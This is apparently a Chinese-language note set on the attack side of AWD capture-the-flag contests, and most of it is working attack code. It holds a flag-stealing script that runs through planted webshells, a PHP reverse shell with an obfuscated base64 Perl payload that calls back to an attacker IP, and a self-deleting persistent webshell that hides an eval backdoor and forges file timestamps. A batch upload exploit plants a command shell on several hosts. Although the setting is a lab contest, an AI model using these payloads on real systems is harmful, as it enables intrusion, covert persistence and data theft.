AWD比赛模式的攻击部分

也简单,也复杂,简单是自动化的问题,复杂是漏洞的复杂度问题

1.赛前检测
2.getflag+sendflag.py
3.php的一些shell脚本
4.一些漏洞能直接getshell的批量脚本
5.典型漏洞的利用(*************)

小流程:

down源码查后门(D盾)

ssh连接配置:https://www.imooc.com/qadetail/65395

shell登陆验证脚本


如果是root用户修改密码
将上个脚本命令改为这个
echo 密码 | passwd --stdin 用户名;
echo testuser:newpasswd | chpasswd



touch -r file1 file2 将file2时间修改为file1时间
1. 同时修改文件的修改时间和访问时间
touch -d "2010-05-31 08:10:30" install.log
2. 只修改文件的修改时间
touch -m -d "2010-05-31 08:10:30" install.log
3. 只修改文件的访问时间
touch -a -d "2010-05-31 08:10:30" install.log



getflag+sendflag



较容易直接getshell的:
上传脚本
命令执行脚本
文件包含脚本

一.赛前检测

shell登陆验证与修改密码.py

# -*- coding:utf-8 -*-
#https://www.cnblogs.com/-qing-/p/11182162.html
import paramiko

ip = '192.168.159.134'
port = '22'
username = 'ctf1'
passwd = 'ctf1'


# ssh 用户名 密码 登陆
def ssh_base_pwd(ip, port, username, passwd, cmd='ls'):
port = int(port)
ssh = paramiko.SSHClient()

ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

ssh.connect(hostname=ip, port=port, username=username, password=passwd)

stdin, stdout, stderr = ssh.exec_command(cmd)

result = stdout.read()
if not result:
print("无结果!")
result = stderr.read()
ssh.close()

return result.decode()


a = ssh_base_pwd(ip, port, username, passwd)
print(a)

二.getflag+sendflag.py

#!/usr/bin/python
# coding=utf-8
# https://www.cnblogs.com/-qing-/p/11182162.html
import sys, requests, base64, time


# 利用一句话木马得到flag

# 加载一句话地址的文件
def shell_list(filepath):
# 格式 http://192.168.174.128/test.php?x=
# 返回列表
try:
with open(filepath,"r") as f:
data=[]
for i in f.readlines():
i=i.rstrip("\n")
if i:
#print(i)
data.append(i)
return data
except:
print("File " + filepath + " Not Found!")


def getflag(filepath):
file = 'flag/flag' + str(time.time())[-5:] + '.txt'
# 加载shell地址
url_list = shell_list(filepath)
# 访问 执行查看flag命令 linux就是cat
cmd = "cat /home/flag"
#getflag_cmd = "echo system(\"%s\");" % cmd
for url in url_list:
url = url.strip("\n") + cmd#getflag_cmd
try:
res = requests.get(url=url, timeout=5)
except:
print(url + "[ - ] request timeout [ - ]")
if res.content:
content = str(res.content)
try:
# 把得到的flag存到flag文件再批量提交
with open(file, 'a') as f:
f.writelines(content.strip("\n") + "\n")
except:
print("写flag.txt文件失败!!")
sys.exit()
print("[+] getflag sucessed! flag文件:" + file)
return file


# 批量提交flag
def sentflag(filepath, url):
filename = getflag(filepath) # 返回存放flag的地址
# 读取存放flag文件
with open(filename, 'r') as f:
flags = f.readlines()
for flag in flags:
links = url + flag.strip('\n')
try:
res = requests.get(url=links, timeout=3)
if res.status_code == 200:
print("[ + ] Send Flag %s Success [ + ]") % flag
except:
print("[ - ] Send Flag Failed [ - ]")
sys.exit()


# 第一个参数需要一个存放shell的地址,格式 http://192.168.174.128/test.php?x=
# 第二个参数需要提交flag的地址 例如http://1.1.1.1/submit.php?token=xxxx&flag=xxxxx
filepath = 'duo_webshell.txt'
url = 'http://192.168.159.134:8081/flag.php?token=123&flag='
sentflag(filepath, url)
#getflag(filepath)

三.php的一些shell脚本

php反弹shell的脚本.php

<?php
function which($pr) {
$path = execute("which $pr");
return ($path ? $path : $pr);
}
function execute($cfe) {
$res = '';
if ($cfe) {
if(function_exists('exec')) {
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif (function_exists('shell_exec')) {
$res = @shell_exec($cfe);
}
elseif (function_exists('system')) {
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif (function_exists('passthru')) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif (@is_resource($f = @popen($cfe, "r"))) {
$res = '';
while(!@feof($f)) {
$res .= @fread($f,1024);
}
@pclose($f);
}
}
return $res;
}
function cf($fname, $text) {
if($fp = @fopen($fname, 'w')) {
@fputs($fp, @base64_decode($text));
@fclose($fp);
}
}
$yourip = "192.168.159.129";
$yourport = '4444';
$usedb = array('perl'=>'perl','c'=>'c');
$back_connect = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
cf('/tmp/.bc',$back_connect);
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");
//上传并访问,用nc -l -vv -p [port]反弹shell
?>

不死马:

<?php 
ignore_user_abort(true);
set_time_limit(0);
unlink(__FILE__);
$file = './.coN123fig.php';
$code = '<?php if(md5($_POST["pass"])=="a810f40b757f543d7fbccdcad3260ff2"){@eval($_POST[cmd]);} ?>';
//pass=N123fi 马儿用法:1.php?pass=N123fi&a=command
while (1){
file_put_contents($file,$code);
system('touch -m -d "2019-7-21 15:20:54" .coN123fig.php');
usleep(50000);
}
?>

一些小马:

http://www.naivete.online/2018/08/%e8%bf%87%e7%8b%97%e4%b8%80%e5%8f%a5%e8%af%9d/

四.一些漏洞能直接getshell的批量脚本:

上传批量:

#coding=utf-8
"""
author:图先生
简介:http://www.youknowi.xin/
time:2019/6/22 8:40
filename:CTF_1.py
"""
import hackhttp
import requests
hh = hackhttp.hackhttp()
raw='''
POST /upload_file.php HTTP/1.1
Host: 192.168.159.128:808{}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.159.128:8082/upload.php
Content-Type: multipart/form-data; boundary=---------------------------21093136245927
Content-Length: 336
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------21093136245927
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/octet-stream

<?php
@system($_GET["cmd"]);
-----------------------------21093136245927
Content-Disposition: form-data; name="submit"

Submit
-----------------------------21093136245927--

'''
#上传文件
url="http://192.168.159.128:808{}/upload_file.php"
for i in range(1,5):
temp_raw=raw.format(str(i))
#print(temp_raw)
temp_url=url.format(str(i))
code, head, html, redirect, log = hh.http(temp_url, raw=temp_raw)
print(temp_url)
print(code)

#cat flag
url="http://192.168.159.128:808{}/upload/shell.php?cmd=cat%20/home/ctf{}/flag"
for i in range(1,5):
s=requests.get(url.format(str(i),str(i)))
print(s.text)

命令执行:

文件包含:

弱密码(mysql,后台等)

ssrf

注入

2019.7.18

标签: